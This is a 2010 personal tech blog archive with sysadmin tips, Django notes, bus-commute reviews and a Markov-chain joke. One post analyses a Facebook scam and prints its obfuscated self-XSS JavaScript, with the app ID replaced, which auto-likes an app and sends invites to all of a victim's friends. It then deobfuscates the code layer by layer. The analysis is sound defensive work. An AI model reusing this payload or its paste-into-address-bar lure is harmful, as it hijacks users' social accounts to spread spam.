100704 19:52:14 [Warning] Failed to setup SSL
100704 19:52:14 [Warning] SSL error: Unable to get certificate

Unsurprisingly, in /var/log/messages, I found:

Jul 4 19:52:14 domU-12-31-39-0E-C9-A1 kernel: [ 8760.837526] type=1503 audit(1278273134.614:23): operation="open" pid=4609 parent=4602 profile="/usr/sbin/mysqld" requested_mask="r::" denied_mask="r::" fsuid=106 ouid=106 name="/vol/etc/mysql/newcerts/server-cert.pem"

The fix for this was pretty simple: I opened /etc/apparmor.d/usr.sbin.mysqld and below the line

/etc/mysql/*.pem r,

I added the line

/vol/etc/mysql/newcerts/*.pem r,


30 June 2010

How to eavesdrop on HTTPS traffic

I had an intermittent problem with my web app: a test suite intended to verify that client-cert SSL* worked was failing. It wasn't failing because the client-cert SSL auth was broken. It was failing because of a 400 Bad Request with the message:

Your browser sent a request that this server could not understand.
Request header field is missing ':' separator.

Of course, since the connection was SSL encrypted, I couldn't easily to see what was going on.

Fortunately, wireshark has SSL decoding built in. It's a bit tricky to use, but this wiki page and this mailing list post explain what to do. Here's the short version:

1. If your server's SSL key isn't in a .pem file already, make one. Here's what I did:
openssl pkcs12 -export -in server.crt -inkey server.key -name "Server Certificate" -out server.p12 -passin pass: -passout pass:
openssl pkcs12 -in server.p12 -out server.pem -nodes -passin pass: -passout pass:

Note that there are no passwords on these keys -- this is my testbed server. If you have passwords on your keys, the steps may be different.

2. Tell wireshark about the .pem file. Go to Edit->Preferences, expand the protocols menu, and
pick SSL from the list. If your https server is running on localhost, port 443, enter ",443,http,/path/to/your/server.pem" in the "RSA keys list" box.

3. Assuming that you don't have SSLCipherSuite defined elsewhere (in which case, you might want to temporarily comment it out if it contradicts this one), add the following entry to your apache2.conf and restart apache:


That turns off Diffie-Hellman key negotiation.

4. Make sure that your browser is opening a fresh connection. In Firefox, closing the tab and opening a new one appeared to be sufficient.

5. Start the capture on the appropriate interface. If everything works, Wireshark will decode it. If not, go back to the preferences dialogue, set a debug file, and try again. Look in the debug file for clues---perhaps Wireshark couldn't read your key, for instance.

* It tried to read a trivial CGI script that just echoed back the SSL environment variables like SSL_CLIENT_M_SERIAL and SSL_CLIENT_VERIFY.

Epic link of the day

If you've never played Xenogears, it won't make any sense, btw.

23 June 2010

Naming and Necessity

I think Microsoft Security Essentials is a great idea. However, one would think that when Microsoft added a feature that they admit might "unintentionally" send your personal information to their computers, they would call it something other than "SpyNet":

20 June 2010


By the way, the suggestion to switch Linux distrubutions in order to get a single app to work might sound absurd at first. And that's because it is. But I've been saturated with Unix-peanut-gallery effluvia for so long that it no longer even surprises me when every question -- no matter how simple -- results in someone suggesting that you either A) patch your kernel or B) change distros. It's inevitable and inescapable, like Hitler. --JWZ

I've been a Debian user since 2002. To get a single app to work, I just switched to Ubuntu.

The app was openssl. I'm building VMs using Ubuntu's vmbuilder, because there's no obvious equivalent for Debian. Unfortunately, the openssl/libssl0.9.8 that ships with Ubuntu (0.9.8k) has some bizarre, inexplicable incompatibility with the openssl/libssl0.9.8/mod_ssl that ships with Apache on Debian (0.9.8n). I was trying to do a SSL client-certificate authentication from the Ubuntu VM to a Debian server. Using a Debian client (openssl s_client or just Python's HTTPS support) and a Debian Apache2 server worked fine. Using an Ubuntu client and an Ubuntu Apache2 worked fine. But the Ubuntu client and the Debian Apache2 failed.

The Right Thing to do would be to come up with a minimal case demonstrating the bug and post it in the appropriate bug tracker, but since I wasn't even sure if the bug was in Apache2 or in openssl, it would have taken some time to find the right place to report it. I was pressed for time and decided to punt by switching everything to Ubuntu.

I backed up my laptop's /var, /etc, and /home to a second computer via rsync. I burned the Ubuntu installer, which turned out to be a coaster: I wanted to encrypt my disk, and only the "alternate" installer supports that. I burned and booted the alternate .iso, erased my original Linux and swap partitions, created an encrypted partition, layered LVM on top of that, created new linux and swap partitions inside the LVM, and started the installation. The install took what seemed like hours longer than a Debian install -- I'm not sure if that's simply because Ubuntu Desktop is much bigger than a minimal Debian install or or because the crypto slowed down disk I/O. Possibly both. But the installer worked perfectly---it even recognized my Vista partitions and added them to the grub menu.

Ubuntu's wireless support is thousands of times more wonderful than Debian's: instead of writing shell scripts to connect to open and WEP networks and having to run them from the command line every time I woke the computer from sleep and being completely unable to connect to WPA networks (the wpa_supplicant manual could double as creepypasta), Ubuntu has NetworkManager and a lovely GUI widget to control wireless connectivity. I don't particularly like always-on GUI widgets, but you can easily hide the Ubuntu widget/menu bar by right-clicking it, choosing 'Properties', and ticking "Auto-hide". I installed enlightenment (packaged as e16) and chose E16-Gnome at the login screen. I switched off all the iconboxes, virtual desktops (I want _multiple_ desktops, not virtual ones), tooltips, and pagers. I made one small change to e16's configuration, editing /etc/e16/bindings.cfg to open gnome-terminal rather than Eterm when I hit Ctrl-Alt-Insert (change "KeyDown CA Insert exec Eterm" to "KeyDown CA Insert exec gnome-terminal"). The result: wonderful.

Oh, and SSL client-auth now works.

18 June 2010

debhelper help

If you want to install a cron.d file using a debian/ubuntu package and you're using debhelper, you can just leave a file called package-name.cron.d in the debian/ directory. The manual explains this. The manual doesn't mention (maybe it's obvious to people other than me) that you have to make sure dh_installcron is in your debian/rules in the appropriate place (for instance, perhaps after dh_installdocs in binary-indep, depending on what kind of package you're building.)

Note that you will also need an explicit username in cron.d, e.g.,

30 12 * * * someuser /usr/sbin/someprogram

14 June 2010

M-x awesome-mode

Since James Fallows mentioned how much he liked full-screen mode in his word processor. Since I use the best text editor known to man, I thought I'd try it. Here's what I added to my ~/.emacs.el. Like all of my .emacs.el, it's cribbed from various places on the 'net, mostly here:

(defun switch-nerd-mode ()
(shell-command "wmctrl -r :ACTIVE: -btoggle,fullscreen"))
(global-set-key [f11] 'switch-nerd-mode)

(Note that this assumes you'll have the menu bar and scroll bar switched on when you're not in full-screen mode. It also assumes that you switched off the toolbar, which is on by default.)

Now, this _almost_ works. But there's one problem:

For whatever reason, there's a thin strip of desktop peeking through. I'm not sure why: Firefox fullscreens perfectly. But Gnome Terminal has the leftover strip. (I don't use any other programs, really.)

I was too lazy to actually debug it, so I did what any respectable nerd would do: I set the desktop background to the same color as my emacs window. I set the desktop to solid black, installed the emacs-goodies-el Debian package, which includes a bunch of color themes, ran M-x color-theme-select, and picked Retro Green, which looks like this:

Yes, that's my whole display. No title bars, scroll bars, task trays, menus, clocks, widgets, heatmaps, thermometers, netload meters, mail indicators --- nothing.

One problem with Retro Green is that its narrow color selection (green and black) mean that fancy major modes with lots of colors are less useful: for instance, in python-mode, I typed os.exec instead of os.system and was wondering why pylint was throwing a syntax error on that line. If I'd been using the standard mode, the exec keyword would have been purple.

One last tip: if you launch ediff, the ediff control window might sometimes appear under your main window, or somewhere off-screen entirely. If you're using Enlightenment 0.16 (which is the least terrible WM I've used), just hit Ctrl+Alt+Home and E will move it to the front so you can put it somewhere sensible.

If someone has a more awesome Emacs windowing setup than this, I'd like to see it. (Note that I'll probably copy it.)

Update: Since I switched to Ubuntu, switching to full-screen mode actually gives me the full screen in both Emacs and gnome-terminal. Win.

11 June 2010

Booting a .vmdk with VirtualBox

I have a VMware .vmdk+.vmx image created with ubuntu's wonderful vmbuilder. I wanted to boot it with VirtualBox (since I didn't see an easy way to install VMware on the Debian box I was using, and didn't think it was necessary). Unfortunately, every time I tried to boot, the system complained that it couldn't find the root filesystem and dropped me to an initramfs busybox shell.

ALERT! /dev/disk/by-uuid/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx does not exist. Dropping to a shell!

I tried editing the root= parameter in grub to change it from a UUID to /dev/sda1 or /dev/hda1, to no avail. Flailing, I reconfigured Virtualbox: I deleted the SATA controller, added an IDE controller, and attached the .vmdk to it. I rebooted. It worked!

09 June 2010

Midafternoon diversion

Result of running a word-based Markov chain text generator on the Craigslist personals:

Men seeking women:

I know you ask; me. I am a message And take control. I also like
older than me each one. I'm adventure and have a vast knowledge of
further: conversation. I would appreciate your highest goals in lieu
of a date this post is consistent actually an issue. Geographic
location open to you after a up my terrible ego jumps out more Please
be cute, woman between ish who's interested. If a normal guy on it is
easy to Hold a normal relationship with dark hair i go to plead with
the contrary.

Women seeking men:

I love to land in quincy. Hi, so I don't forget I am saying
certain to chat and I love type a friend long time with. Life
has a light brown hair, blue eyes. I love? You're not thin,
or maybe a Great day, that is this is kind, of yourself in size
work day and just be athletic is your parents, must not for
work out with photos get I Am a spider. He life I am not much
more than dwell on your my own my group or go to cook, wrestle,
go out or ROBOTS Please be greatly appreciated with you like to
be become been to all I'm one of chick this?

Women seeking women:

Someone who is just so not? I am looking; for me A the Trina Hamlin
figthing didnt want someone who has in a little experience, a person
but know me and I'll send me an unfortunate circumstance since middle
school and therefore often in College student but it's pretty hard at
least for? It is there.

Men seeking men:

Older guy here looking for if you must big jock looking for details to
travel. I'm masc or an oler guy here: and here (to party and also be
Very private very goodlooking and me beg)? I am masculine hairy fit,
maybe your hot? Wm looking to try it slow with a time, for games Yr
old asian guys interested?

04 June 2010

Django CSRF gotcha

Django contains a decorator, @csrf_exempt, that you can apply to a view function to tell the anti-CSRF CsrfViewMiddleware to ignore that view. While it's obvious in retrospect, make sure you apply the decorator to the actual view (e.g., the function listed in; otherwise, if you apply it to a function called by that view function, CsrfViewMiddleware will merrily ignore it and raise a CSRF error.

03 June 2010

FUSE confusion

The FUSE error

fuse: device not found, try 'modprobe fuse' first misleading. You might actually have the FUSE module loaded (check with lsmod|grep fuse), but the device doesn't exist. Check for the presence of /dev/fuse. In my case, it was never created because udev wasn't running when I installed FUSE or loaded the fuse module (or possibly both). Some combination of /etc/init.d/udev start and /etc/init.d/udev stop and /etc/init.d/udev reload got udev to create /dev/fuse.

That meant that I graduated to the next peanut-gallery error:

mount: unknown filesystem type 'ext4'

(I'm running Debian Lenny, so ext4 is only supported if you ignore the dire warnings.)


26 May 2010

Django manual-transaction fun

If you use the @commit_manually decorator to manage a transaction, Django will throw a TransactionManagementError ("Transaction managed block ended with pending COMMIT/ROLLBACK") if you fail to commit or rollback the transaction before you exit the function.

If you exit the function due to an exception, Django will sometimes show you the exception that caused the exit. But sometimes it will not: it will only show you the TransactionManagementError, leaving you scratching your head. I've discovered that you get the TransactionManagementError if you modify an object via Django's object-relational mapper. You get the the underlying exception if you modify the database via a raw SQL query. Example:


def test_view(request):
cur = connection.cursor()
cur.execute("insert into quux (val) values ('a')")
tmodel = TestModel(somenum = 5)
assert 0
return HttpResponse("id: %d" % val_id)


class TestModel(models.Model):
somenum = models.IntegerField()

manually-created InnoDB table:

`id` integer primary key AUTO_INCREMENT,
`val` text
If you view test_view, you will get a TransactionManagementError. If you move the "assert 0" above the, you get an AssertionError. Raw SQL queries are fine, but you get confusing results if you use the mapper.

If you comment out but call transaction.set_dirty(), as you're supposed to when you modify the database with raw SQL, you get a TransactionManagementError.

Lesson: if you're getting unexpected TransactionManagementErrors, make sure your code isn't throwing exceptions. Quick fix to see the underlying exception: comment out the @commit_manually decorator. You will lose transactional integrity, so don't do this on a production system.

13 May 2010

Those darn Facebook scammers!

I've lately received a few spammish Facebook "suggestions":
  • Subject: [name withheld] suggested you become a fan of *Whole Foods Market*FREE $500 Gift Card* Limited - first 1...
  • Subject: [name withheld] suggested you become a fan of SEE WHO'S VIEWING YOUR PROFILE NOW!..
  • Subject: [name withheld] suggested you like How a Competition Ended a 10 Year Marriage - Video...
  • Subject: [name withheld] suggested you like PROVEN - Most Adults CANNOT solve th!s YET Almost ALL children CAN...

All of the [name withheld]s were people I know who'd evidently been duped in some way or other. Since the very last one was a computer scientist at a very famous Eastern university, I had to figure out how they'd done it. I defanged whatever evils lurked on the page by clearing my Facebook cookies, then Googled the "most adults" subject line to find the page. (I didn't want to click the link, in case it included some identifier that would let the evil app work even without my having logged in.)

The page contained a "riddle" (formatted as an image, possibly to defeat a text-search for this scam):

...followed by a "click for solution" button that ran clever little JavaScript program. First it asked me to hold down the Control key. Any adult can do that, right? Then "C". Then it told me it had copied something to my clipboard. Clever. It must have been from a hidden selection area. Then it asked me to press and hold "Alt", then press "D" to select the address bar. Finally, it asked me to press "Control" and then "V", followed by Enter. I wasn't logged in, so this didn't do anything but bring up a "Loading..." box. This was the code snippet, prefixed with "javascript:" to make it executable in the location bar.

(I have changed the app ID 120715334615757 to XYZ just to make it harder for someone to inadvertently run this code.)

function(){a='appXYZ_jop';b='appXYZ_jode';ifc='appXYZ_ifc';ifo='appXYZ_ifo';mw='appXYZ_mwrapper';eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'),0,{}))})();

That was enlightening.

If you replace eval( with alert( and run this code, you'll strip off the first layer of obfuscation:

var _0x95ea=["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79","\x73\x74\x79\x6C\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x68\x69\x64\x64\x65\x6E","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x76\x61\x6C\x75\x65","\x73\x75\x67\x67\x65\x73\x74","\x6C\x69\x6B\x65\x6D\x65","\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73","\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74","\x63\x6C\x69\x63\x6B","\x69\x6E\x69\x74\x45\x76\x65\x6E\x74","\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67"];d=document;d[_0x95ea[2]](mw)[_0x95ea[1]][_0x95ea[0]]=_0x95ea[3];d[_0x95ea[2]](a)[_0x95ea[4]]=d[_0x95ea[2]](b)[_0x95ea[5]];s=d[_0x95ea[2]](_0x95ea[6]);m=d[_0x95ea[2]](_0x95ea[7]);c=d[_0x95ea[9]](_0x95ea[8]);c[_0x95ea[11]](_0x95ea[10],true,true);s[_0x95ea[12]](c);setTimeout(function(){fs[_0x95ea[13]]()},5000);setTimeout(function(){SocialGraphManager[_0x95ea[16]](_0x95ea[14],_0x95ea[15])},5000);setTimeout(function(){m[_0x95ea[12]](c);d[_0x95ea[2]](ifo)[_0x95ea[4]]=d[_0x95ea[2]](ifc)[_0x95ea[5]]},5000);

The \x?? junk looks like hexadecimal escapes, so let's run those through a tiny Python program to decode them:

import re, sys
base = r"""{insert the code here}"""
last = 0
for obj in re.finditer(r"\\x[0-9a-fA-F][0-9a-fA-F]", base):
item = chr(int(base[obj.start():obj.end()].replace("\\x",""),16))
last = obj.end()

Off comes the second layer of obfuscation:

var _0x95ea=["visibility","style","getElementById","hidden","innerHTML","value","suggest","likeme","MouseEvents","createEvent","click","initEvent","dispatchEvent","select_all","sgm_invite_form","/ajax/social_graph/invite_dialog.php","submitDialog"];d=document;d[_0x95ea[2]](mw)[_0x95ea[1]][_0x95ea[0]]=_0x95ea[3];d[_0x95ea[2]](a)[_0x95ea[4]]=d[_0x95ea[2]](b)[_0x95ea[5]];s=d[_0x95ea[2]](_0x95ea[6]);m=d[_0x95ea[2]](_0x95ea[7]);c=d[_0x95ea[9]](_0x95ea[8]);c[_0x95ea[11]](_0x95ea[10],true,true);s[_0x95ea[12]](c);setTimeout(function(){fs[_0x95ea[13]]()},5000);setTimeout(function(){SocialGraphManager[_0x95ea[16]](_0x95ea[14],_0x95ea[15])},5000);setTimeout(function(){m[_0x95ea[12]](c);d[_0x95ea[2]](ifo)[_0x95ea[4]]=d[_0x95ea[2]](ifc)[_0x95ea[5]]},5000);

Now, if we run this through a JavaScript beautifier, we can strip off one more layer. This beautifier appears to have partially evaluated the code, kindly substituting references to the array _0x95ea with the corresponding values:

d = document;
d['getElementById'](mw)['style']['visibility'] = 'hidden';
d['getElementById'](a)['innerHTML'] = d['getElementById'](b)['value'];
s = d['getElementById']('suggest');
m = d['getElementById']('likeme');
c = d['createEvent']('MouseEvents');
c['initEvent']('click', true, true);
setTimeout(function () {
}, 5000);
setTimeout(function () {
SocialGraphManager['submitDialog']('sgm_invite_form', '/ajax/social_graph/invite_dialog.php')
}, 5000);
setTimeout(function () {
d['getElementById'](ifo)['innerHTML'] = d['getElementById'](ifc)['value']
}, 5000);

I'm not going to do a complete trace, but it's pretty clear from the above that the code is telling Facebook to "like" an application, waiting five seconds, then submitting a the form that sends the "like" suggestion to all of your friends. Ouch.

30 March 2010

Reverse mirroring with lftp

$ lftp -u username,password -e "mirror --reverse -x .*tif --only-newer --verbose /home/me/path/somewhere ."

I'm using a hosting account that supports ftp but not rsync. Fortunately, lftp provides rsync-like capability: reverse mirroring. The above command will copy the local directory /home/me/path/somewhere to the remote directory . (wherever you land when you first log in) on, excluding files that end in "tif", only copying newer files.


17 March 2010

The Boston-New York City Commute, part II

Now that Megabus has returned to South Station, it's a viable option for my NYC-Boston commute. I tried it again last night for the first time in some years. Thoughts:


  • MB has a 1:30 a.m. departure. The only other company that runs this late is Greyhound. Unlike Greyhound, this bus arrives just as the T starts running, makes no stops (many late-night Greyhound services stop in Worcester), and doesn't involve waiting in the basement of the Port Authority Bus Terminal. (Embarking outdoors at 31st and 8th might be unpleasant in the rain, though.)
  • The double-decker coaches are great. As comfortable as Bolt Bus but with cruelty-free seats, lots of legroom, 110v outlets, and very fast WiFi.

  • The WiFi network blocks ssh (port 22). WHY? I could still ssh from my phone, but I couldn't do real work that way. Who blocks 22 in this day and age?

The megabus website is a disaster on mobile phones. I tried to buy a ticket from a Droid. I was redirected to the "mobile" website, which contained nothing but a warning that the mobile website wasn't ready yet and a link to the regular website. That's fine; the Android browser can handle anything. I clicked the regular-website link and navigated to the "select a bus" screen, but every time I clicked a departure time, I was immediately redirected back to the useless "mobile" website. I suspect the "don't send me to the mobile site" was a request parameter rather than a cookie, someone forgot to add it to whatever request was silently triggered when I clicked a departure time.

I tried calling the booking number. Fortunately, they had someone on duty, fortunately, she even could pass me to a customer service agent. Unfortunately, the customer service agent couldn't help me. (Understandably -- this was 11pm.) [I could have booked the ticket over the phone, but paying the service fee when I had a perfectly working browser seemed silly.]

Eventually, I found steel, an alternative browser interface for Android. Steel lets you spoof your User-Agent header and pretend to be a desktop computer. Went back to the site -- huzzah! No more mobile-site redirects.


Great departure-time selection, nice amenities, inexplicably restricted network, dreadful mobile-phone user experience. And very fast. We left at 1:30 and arrived at 5:16. The T came at 5:30, so I was back before sunrise.

08 March 2010

The Boston-New York City Commute

usAn old college buddy asked on Facebook:

Going up to Boston from NYC: Megabus, Bolt Bus, or rickety Chinatown bus? What say you, oh Facebook friends?

I've made this commute about two or three times a month, more or less every month since Sept. 2007, so I had a few comments.

(All buses stop at South Station in Boston, unless otherwise noted.)

Bolt Bus is the best all-around option. The Prevost X3-45 coaches have lots of legroom, nice seats (some even have seatbelts), WiFi, and power outlets. A ticket on a less-than-full bus is $15.50 with all fees included. As a given bus sells out, the price gets closer to $20. BB leaves from 34th and 8th, right by Penn Station. Disadvantages: BB sells out quickly on Fridays. You can often buy a seat as a standby for $20 in cash, but even this is tricky at peak hours on Fridays -- there are lots of other standby passengers. The midtown departure can be slow on Monday mornings -- sometimes, the driver will go through NJ to avoid driving north through Manhattan. (Today, I left at 7:30 and arrived around 12:07.) Get an account: you get a free ride after every eight tickets, and you're automatically placed in the first boarding group when you sign in, so you get first pick of the sea

I haven't taken Megabus since they moved to Back Bay station, but I understand they've switched back to South Station as of March 1, 2010. They now operate double-decker coaches which I haven't taken. Their single-decker coaches had WiFi (which sometimes worked), but no power outlets. Their NYC stop was also right by Penn Station. Update: they're back at South Station. Impressions here.

Fung Wah Bus and Lucky Star Bus are "Chinatown" bus lines, so named because their NYC stops are in Chinatown. FW and LS rarely sell out and have gate agents at both ends of the route, so you can buy tickets minutes before departure. Tickets are $15, except for a $25 2:30 a.m. departure. LS advertises WiFi but I've never managed to get it to work. (My Debian setup may be a complicating factor; for some reason, LS uses encrypted WiFi.) LS has a slightly shorter route from the Williamsburg Bridge to the stop in NYC, otherwise, the two are very similar. The NYC stops are a short walk from the B/D and a longer walk up Canal St. from the 6. The seat pitch on the FW/LS buses is much smaller than on the Bolt Bus, so it's harder to work with a laptop.

Chinatown buses have a reputation for cutting corners on maintenance, safety, and driver training; I've heard horror stories. On the plus side, they tend to be a bit faster than the other lines, and I've also heard that they've cleaned up their act. I haven't had a problem, yet.

Greyhound also runs the Prevost X3-45 on the Boston-New York route, so passengers have WiFi and outlets. Greyhound's prices are slightly higher (especially if you don't buy tickets from their website). Their Manhattan destination is the Port Authority Bus Terminal, which is very grim. On the plus side, they're the only operator with buses from Manhattan in the wee hours of the morning. Make sure you pick a route with no stops (or at most one stop); you certainly do not want the eight-hour multi-stop tour of Connecticut.

General observations:

If you're lucky, the driver won't waste 10-20 minutes stopping at a rest area. Very late and very early buses are less likely to stop. Keep in mind that all buses have bathrooms, so the stop is primarily for people who can't go for four hours without eating.

Leaving at unpopular hours makes the trip much more pleasant. Not only will you avoid traffic, but you're more likely to have an empty seat next to you. (This is particularly important on the Chinatown buses, where the seats are tiny.)

Bus WiFi can be unreliable; a tethering card or a smartphone with tethering capability lets you skip the "will the WiFi work?" lottery. I've had good connectivity through Verizon Wireless for the whole route.

South Station has a parking deck on the roof; the first 15 minutes are free. If you're really cheap, you could idle outside the gate until whomever you're picking up gets there...

LimoLiner. Premium bus service. I've seen advertisements in South Station but never tried them.

Non-bus options:

Amtrak. Amtrak has two services: the Northeast Regional (about 4 to 4.5 hours) and the Acela Express (about 3.5 hours). Prices range from $50 and up for the Regional and about $90 and up for the Acela; prices rise considerably as the trains sell out. I used to take the Regional frequently; I've never taken the Acela. The primary advantages are nicer seats, a quieter ride, outlets, and tray tables. The train also has a snack bar. Acela, I've heard, has finally begun to roll out WiFi.

The only major reason to take the Regional is to avoid traffic, otherwise, the Bolt Bus makes the exact same trip, in about the same amount of time at off-peak hours. BB's seats are smaller and lacks tray-tables, but has WiFi and more frequent departures. An off-peak Chinatown bus is often faster than the regional. If you're heading to the northern Bronx, you can shave a fair bit of time off your trip by getting off the Regional at New Rochelle (note that only some trains stop there) and taking a taxi, instead of going all the way to Penn Station and back out again.

Flying. I haven't flown BOS-NYC, but L. has taken a few flights. Delta seems to be the cheapest for last-minute fares, based on a very small sample size. The flight is fast but the TSA delay and the difficulty of getting from New York's airports into Manhattan will slow you down. LGA has no subway stop (Robert Caro blamed this on Robert Moses); you can take the (slow) M60 bus, which meets the N/W in Queens and the 2/3 and the 4/5/6 and the A/B/C/D at 125th St. in Manhattan.

At JFK, you can take the AirTrain for $5 to the A train or to the LIRR (a CityTicket may save you a few dollars) into Penn Station. There is a flat $45 cab fare from JFK to anywhere in Manhattan.

New York Airports Service, a private shuttle, runs from LGA to Penn Station; I've taken it several times, although not lately. You can also fly to Newark, where the AirTrain will take you to NJ Transit to Penn Station. You can also take a local bus from EWR to the PATH into Manhattan. (I haven't tried this.) Wikitravel has a more detailed rundown of how to get into NYC from its airports.

Driving. Pluses: you can go door-to-door. You can take FDR Drive and skip all the lights in Manhattan. Minuses: you can't work, have to stay awake (assuming that you're driving yourself), and have to find a place to park. I've only tried this once.


Take BoltBus, unless you are leaving very late when BB doesn't run, leaving at peak hours and could not get an advance ticket, or have an origin/destination in the Lower East Side and would like to avoid going through midtown. Take the Greyhound if you have to leave really late or want a nicer ride when Bolt Bus is sold out. Take the Chinatown bus if you need to make a last-minute trip. Take the Regional if you want to avoid traffic, take the Acela if you want to go a bit faster. Fly if you need to minimize travel time and don't mind the price and the 90 minutes or so when you have to be offline.

28 February 2010

Great moments in sysadminning

Folks, I finally retired my last SMTP server. I no longer run a server that accepts mail on port 25 (or port 527, or port 465) anywhere on the Internet. Forwarding my mail is now Someone Else's Responsibility.*

I had switched to Google Apps Premium for my business mail long ago, but continued to run my personal mail through an SMTP server. Comcast, for some reason, required me to use SMTP AUTH, and getting the password seemed like a major bother.

I discovered today that I do not actually have to use SMTP AUTH to connect to (which makes perfect sense; Comcast shouldn't have a problem determining if mail was coming from its customers.) So I switched nullmailer to point to

The droid was a bit trickier. Apparently, Gmail will act as your SMTP server if you ask it nicely. Of course, I'm sure Google will keep a copy of all of your outgoing mail forever and use it to build a privacy-invading psychological profile of you, but whatever. My Droid's keyboard is too small to write anything that interesting, anyway. One problem: after I entered the settings into k9mail, k9mail was still sending mail through the old server. I shut down the old server and rebooted the phone; that seemed to fix it.

* I have high hopes, although I'm of course half-expecting to see dropped messages, long-delayed messages, weeks-long email droughts, and all of the other problems. I think the only real solution is to give up on computers altogether.

25 February 2010

signature fun

I used to wonder why smartphones inserted advertisements at the end of email messages: "Sent from my Motorola Q.", "Sent from my iPhone.", "Sent from my Verizon Wireless Blackberry." "Sent from my Palm Pre." Then I realized that it was an apology. One would look less curt with a short message or sloppy with a message with typos. Some correspondants even took took the opportunity for humor: "Sent from a mobile device with a small, cramped keyboard." "Message by E---. Typos by iPhone."

Could one take advantage of these signatures? Perhaps, by adding "Sent from a mobile device." to _all_ of one's emails, one could avoid ever seeming curt or sloppy. One would also seem exceptionally busy (for busy people are always handling email on the road) but still dedicated (for, when one does send a long message with lots of links, the recipient will be thrilled that one took so long to tap it out on an iPhone.)


Sent from a real computer.

10 February 2010

The best part about Linux: you get to be your own sysadmin!

Some time back, Firefox started trying to open PDFs in the GNU Image Manipulation Program, which is a dreadful way to read PDFs. The only alternative was to save the PDF and open it from the command line -- clicking it in the downloads list also launched the photo editor.

This is apparently a known Debian bug: see this report. To fix it, edit /usr/share/applications/mimeinfo.cache and make sure that the line for application/pdf does not include any image editors.

About Me

blog at barillari dot org Older posts at